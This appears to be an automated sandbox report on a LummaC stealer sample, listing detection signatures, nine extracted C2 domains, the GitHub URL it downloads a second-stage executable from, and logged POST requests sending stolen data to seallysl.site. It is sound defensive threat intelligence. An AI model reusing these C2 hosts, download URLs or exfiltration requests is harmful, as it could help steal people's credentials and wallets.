Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544948
MD5: 3ba35e9d091539ec658813e3d15e4b89
SHA1: 3baf91a24418399f05d99206f8f004ae48d6a134
SHA256: aa133af788a57f91449a01402067a28f744172154f3a5d3f8d0d47f350037ec8
Tags: exeuser-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Lipras\pdf.exe Avira: detection malicious, Label: HEUR/AGEN.1314134
Found malware configuration
Source: pdf.exe.7980.7.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["opposezmny.site", "faulteyotk.site", "contemteny.site", "ponintnykqwm.shop", "authorisev.site", "servicedny.site", "seallysl.site", "goalyfeastz.site", "dilemmadu.site"], "Build id": "g392sM--"}
Multi AV Scanner detection for dropped file
Source: C:\Lipras\pdf.exe ReversingLabs: Detection: 59%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Lipras\pdf.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: servicedny.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: authorisev.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: faulteyotk.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: dilemmadu.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: contemteny.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: goalyfeastz.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: opposezmny.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: seallysl.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: ponintnykqwm.shop
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: Workgroup: -
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp String decryptor: g392sM--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Lipras\pdf.exe Code function: 7_2_0004D5AF CryptUnprotectData, 7_2_0004D5AF
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb source: file.exe
Source: Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdbnh source: file.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] 7_2_00040130
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov byte ptr [ebx], dl 7_2_00040130
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] 7_2_00040130
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov edx, ecx 7_2_00040130
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov edx, ecx 7_2_00040130
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx esi, byte ptr [eax] 7_2_000741F0
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov byte ptr [ebx], cl 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov ecx, eax 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then lea edx, dword ptr [eax-80h] 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch] 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh] 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov dword ptr [esi+04h], eax 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov byte ptr [ebx], al 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 4x nop then jmp eax 7_2_0004D5AF
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ecx, byte ptr [edi+ebx] 7_2_00035820
Source: C:\Lipras\pdf.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 7_2_0005E870
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_0004C8CE
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov ecx, eax 7_2_0003E8DE
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h] 7_2_0004011A
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov byte ptr [ebx], dl 7_2_0004011A
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h] 7_2_0004011A
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov edx, ecx 7_2_0004011A
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov edx, ecx 7_2_0004011A
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ebx, byte ptr [edx+esi] 7_2_0003C960
Source: C:\Lipras\pdf.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h 7_2_0006B170
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov ecx, eax 7_2_0003E996
Source: C:\Lipras\pdf.exe Code function: 4x nop then jmp eax 7_2_0005AA40
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch] 7_2_0005AA60
Source: C:\Lipras\pdf.exe Code function: 4x nop then jmp edx 7_2_000732C0
Source: C:\Lipras\pdf.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 7_2_000732C0
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh] 7_2_0006FAD0
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov edi, edx 7_2_00051B40
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx esi, byte ptr [eax] 7_2_00074380
Source: C:\Lipras\pdf.exe Code function: 4x nop then jmp edx 7_2_000733B0
Source: C:\Lipras\pdf.exe Code function: 4x nop then xor byte ptr [ecx+ebx], bl 7_2_000733B0
Source: C:\Lipras\pdf.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 7_2_0005E400
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov edi, esi 7_2_0004ECDE
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov ebx, eax 7_2_0003D500
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 7_2_0005DE70
Source: C:\Lipras\pdf.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_0004C6E0
Source: C:\Lipras\pdf.exe Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h] 7_2_0006F7E0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49740 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49742 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49743 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49739 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49738 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49741 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49745 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2057093 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site) : 192.168.2.4:49856 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49744 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.180.76:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.180.76:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: opposezmny.site
Source: Malware configuration extractor URLs: faulteyotk.site
Source: Malware configuration extractor URLs: contemteny.site
Source: Malware configuration extractor URLs: ponintnykqwm.shop
Source: Malware configuration extractor URLs: authorisev.site
Source: Malware configuration extractor URLs: servicedny.site
Source: Malware configuration extractor URLs: seallysl.site
Source: Malware configuration extractor URLs: goalyfeastz.site
Source: Malware configuration extractor URLs: dilemmadu.site
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vonuch1/start/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seallysl.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: seallysl.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: seallysl.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: seallysl.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: seallysl.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: seallysl.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570144Host: seallysl.site
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vonuch1/start/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: ponintnykqwm.shop
Source: global traffic DNS traffic detected: DNS query: seallysl.site
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seallysl.site
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000004.00000002.1737431201.0000000007E93000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000002.4141670945.0000000002386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: file.exe, 00000000.00000002.4141670945.0000000002386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.comd
Source: powershell.exe, 00000002.00000002.1759697438.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: file.exe, 00000000.00000002.4141670945.00000000023C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: file.exe, 00000000.00000002.4141670945.00000000023C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000002.00000002.1752259690.0000000005025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.4141670945.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1752259690.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.00000000048E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1752259690.0000000005025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.enigmaprotector.com/
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.enigmaprotector.com/openU
Source: powershell.exe, 00000004.00000002.1735434885.0000000006F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.1752259690.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.00000000048E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4141670945.0000000002380000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.4141670945.0000000002377000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe, 00000000.00000002.4141670945.0000000002301000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.4141670945.0000000002310000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe
Source: file.exe String found in binary or memory: https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe#C:
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000002.00000002.1759697438.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.4141670945.00000000023A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: file.exe, 00000000.00000002.4141670945.00000000023A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/vonuch1/start/refs/heads/main/khtoawdltrha.exe
Source: pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927002716.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2004766910.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927112545.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/0t
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/apQ$
Source: pdf.exe, 00000007.00000002.2179825249.000000000083D000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000082B000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/api
